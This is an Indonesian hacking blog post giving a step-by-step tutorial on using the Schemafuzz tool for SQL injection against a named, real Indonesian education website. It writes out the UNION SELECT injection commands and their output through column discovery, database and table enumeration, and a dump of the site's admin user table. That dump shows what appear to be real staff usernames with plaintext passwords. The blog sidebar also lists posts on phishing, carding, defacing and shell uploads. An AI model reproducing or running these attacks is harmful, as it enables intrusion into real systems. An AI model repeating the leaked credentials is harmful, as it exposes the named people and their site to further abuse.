1.Python (http://www.python.org/ftp/python/2.5/python-2.5.msi)
2.Schemafuzz (http://rup.ee/schemafuzzy.py)3.CMD
buka cmd masuk ke folder tempat schemafuzz.py berada...ketikkan -> schemafuzz.py -u "url target" --perintah (list perintah ada di bawah)1. masukkan targetsaya contohkan target adalah ->http://www.ditplb.or.id/profile.php?id=1
2.Masukkan perintah untuk mencari colom namecontoh: schemafuzz.py -u "http://www.ditplb.or.id/profile.php?id=1" --findcolMaka keluar:
[+] URL: http://www.ditplb.or.id/profile.php?id=1----[+]Evasion Used: "+" "--"
[+] 20:36:29
[-] Proxy Not Given
[+] Attempting To find the number of columns...
[+] Testing: 0,1,2,[+] Column Length is: 3
[+] Found null column at column #: 2
[+] SQLi URL: http://www.ditplb.or.id/profile.php?id= ... CT+0,1,2--
[+] darkc0deURL: http://www.ditplb.or.id/profile.php?id= ... 1,darkc0de[-] Done!
ternyata ada 2 kolom.Berarti kita gunain http://www.ditplb.or.id/profile.php?id= ... 1,darkc0de untuk inject
3.Cari database dg command --dbscontoh : schemafuzz.py -u "http://www.ditplb.or.id/profile.php?id=1+AND+1=2+UNION+SELECT+0,1,darkc0de " --dbsMaka keluar:
Code:
[+] URL: http://www.ditplb.or.id/profile.php?id= ... darkc0de--
[+] Evasion Used: "+" "--"
[+] 2032
[-] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: t15618_plbUser: t15618_plbid@localhost
Version: 5.0.32-Debian_7etch8
[+] Showing all databases current user has access too!
[+] Number of Databases: 1
[0] t15618_plb
[-] 2039
[-] Total URL Requests 3
[-] Done
disitu udah keliatan nama DBnya??? t15618_plb
4.Cari nama table dalam databasecontoh: schemafuzz.py -u "http://www.ditplb.or.id/profile.php?id=1+AND+1=2+UNION+SELECT+0,1,darkc0de " --schema -D namadatabaseJadinya: schemafuzz.py -u "http://www.ditplb.or.id/profile.php?id=1+AND+1=2+UNION+SELECT+0,1,darkc0de " --schema -D t15618_plbMaka keluar:Code:
[+] URL: http://www.ditplb.or.id/profile.php?id= ... darkc0de--
[+] Evasion Used: "+" "--"
[+] 20:43:10
[-] Proxy Not Given[+] Gathering MySQL Server Configuration...
Database: t15618_plb
User: t15618_plbid@localhost
Version: 5.0.32-Debian_7etch8[+] Showing Tables & Columns from database "t15618_plb"[+] Number of Tables: 11[Database]: t15618_plb[table: Columns][0]bukutamu: id,pengirim,email,pesan[1]frm_daftarartikel: id_daf_art,id_kat,daftarartikel,pengirim[2]frm_detailartikel: id_det_art,id_kat,id_daf_art,detailartikel,keteran gan[3]frm_kategori: id_kat,kategori[4]kabupaten: ID_kab,ID_prop,Kabupaten[5]pelatihan: ID,Pelatihan[6]profile: ID_Profile,sinopsis,Profile[7]propinsi: ID_prop,Propinsi[8]sd: ID_sd,ID_1,SD,Detail[9]sekolah: ID_sek,ID_prop,ID_kab,Sekolah,Alamat,Telp,Email[10]user: ID_user,UserID,Password,Keterangan,Admin[-] 20:44:39[-] Total URL Requests 43[-] Done
Berarti web itu mempunyai 11 tabel.... n nama kolomnya juga udah ada..... tinggal pilih deh mana yang mau ditelanjangin...hhehehe (emg cewek ) :P
5.Melihat isi dari suatu tabel n kolomcontohl :schemafuzz.py -u "http://www.ditplb.or.id/profile.php?id=1+AND+1=2+UNION+SELECT+0,1,darkc0de " --dump -D namadatabase -T namatable -C namakolomJadinya :schemafuzz.py -u "http://www.ditplb.or.id/profile.php?id=1+AND+1=2+UNION+SELECT+0,1,darkc0de " --dump -D t15618_plb -T user -C ID_user,UserID,Password,Keterangan,AdminMaka keluar:Code:
[+] URL: http://www.ditplb.or.id/profile.php?id= ... darkc0de--
[+] Evasion Used: "+" "--"
[+] 20:53:46
[-] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: t15618_plb
User: t15618_plbid@localhost
Version: 5.0.32-Debian_7etch8
[+] Dumping data from database "t15618_plb" Table "user"
[+] and Column(s) ['ID_user', 'UserID', 'Password', 'Keterangan', 'Admin']
[+] Number of Rows: 13
[0] 1:direktur:direkturplbirektur PLB:Admin Direktur PLB:
[1] 2:yusuf:siplb:Achmad Yusuf:Admin Achmad Yusuf:
[2] 3:abdulmukti:fatmawatimukti: P. Abdul Mukti:Admin P. Abdul Mukti:
[3] 4:harryrogkal: ProgKAL:Admin ProgKAL:
[4] 5:samino:kurikulum:Kurikulum:Admin Kurikulum:
[5] 6:mugiarsih:manajemen:Manajemen:Admin Manajemen:
[6] 7:sutopo:kesiswaan:Kesiswaan:Admin Kesiswaan:
[7] 8:winarno:sarana:Sarana:Admin Sarana:
[8] 9:sanusi:tatausaha:Tata Usaha:Admin Tata Usaha:
[9] 10:sutji:evaluasi:Evaluasi:Admin Evaluasi:
[10] 11:thamrin:informatika:Informatika:Admin Informatika:
[11] 12:adjie:kerjasama:Kerjasama:Admin Kerjasama:
[12] 13:media:media:Media:Admin Media:
[13] No data
[-] 20:54:14
[-] Total URL Requests 15
[-] Done
Oops... kok user id n passwordnya gak di encrypt ya...........mungkin ini rejeki kita biar gak susah2 decryptnya
Cara diatas berlaku untuk sql versi 5 , untuk versi 4 gunakan perintah --fuzz untuk menemukan nama tabel n kolomcontoh:schemafuzz.py -U "http://www.ditplb.or.id/profile.php?id=1+AND+1=2+UNION+SELECT+0,1,darkc0de " --fuzz
sekian tutor cupu ini moga bermanfaat. kalo ada yang kurang mohon di tambahin OK
Langganan:
Posting Komentar (Atom)
HTML
Blogroll
Popular Post
-
1.Python ( http://www.python.org/ftp/python/2.5/python-2.5.msi ) 2.Schemafuzz ( http://rup.ee/schemafuzzy.py ) 3.CMD buka cmd masuk ke fold...
-
<!– –> Memberi komentar atau keterangan. Kalimat yang...
-
Jika ada orang bicara mengenai kita di Belakang, itu adalah tanda bahwa kita sudah ada di DEPAN. Saat orang bicara Merendahkan diri kita, it...
-
SABTU, 24 MARET 2012 Aku Ingin Menjadi Hacker (Motivasi Buat Newbie) K etika pertama kali mengenal k...
-
Belajar C //////////// /// /// – tutorial /// /// //////////// Pada tutorial ini, diberikan penjelasan singkat tentang tipe data di C, dasar...
-
cuman mau mengingatkan jangan sampe ke asyikan deface web orang lain sampe sampe security web kita gak di perhatikan mungkin kalaw bug...
-
Udah lama ngga posting tentang tutor defacing website hehee, Sekarang saya akan sempatkan membahas tentang Cyber Gravity lagi nih... yai...
-
Pernah mencoba meretas akun twitter teman anda? Pasti pernah, tapi apakah pernah berhasil? Lebih baik jangan meretas twitter mereka, lebih b...
-
ANDA INGIN MENJADI SEORANG HACKER, TAPI TIDAK MENGETAHUI BAGAIMANA CARANYA? Pertama kali, saya akan menciutkan nyali siapapun yang ingin...
-
tak pernah kurasa sebelumnya ikatan erat pada sebuah kota kota kecil yang manis dan ramah kota tempatku tumbuh dan melihat dunia tak pern...
Followers
About Author
Pages
Diberdayakan oleh Blogger.
Archive
-
▼
2012
(35)
-
▼
Juni
(34)
- Cara Membuat Aplikasi Phishing Dengan VB 6
- "Portail Dokeos" File Upload vulnerability
- Memeriksa dan Menghentikan Serangan DDoS
- Bugs Template CMS Lokomedia After Patch
- TEKNIK DASAR CARDING
- Program C++ Luas dan Keliling Lingkaran
- Program C++ Luas Segitiga
- Contoh pascal program pengurutan data
- Belajar C++/C
- Deface Website SQL Injection with Havij
- Cara Deface Website Menggunakan Teknik XSS Vulnera...
- Perkuat login admin web kamu
- Cara Deface website dengan Schemafuzz
- Selamat Tinggal
- Jadi diri sendiri itu Indah
- Gue bukan hacker !!
- anda ingin menjadi seorang hacker, tapi tidak meng...
- Dari Newbie jadi Hacker
- Ajari Saya bagaimana menjadi Hacker yang baik
- Aku Ingin Menjadi Hacker (Motivasi Buat Newbie)
- Belajar Menjadi Hacker (Newbie)
- Cerita Perjalanan Seorang Newbie Menjadi Hacker
- Cara Upload Shell Melalui phpmyadmin
- Make a fake Twitter Password
- Source Code Twitter Auto Followers
- How to build your own Twitter client
- HTML syntax
- Tentang Hidup
- Alasan kenapa gue jomblo
- Tutorial HTML: Kumpulan Tag HTML
- Tips Buat Komputer Bicara
- Surat dari Anak yang di Aborsi
- Belajar bahasa CMD
- pengertian bahasa deface
-
▼
Juni
(34)
Tidak ada komentar:
Posting Komentar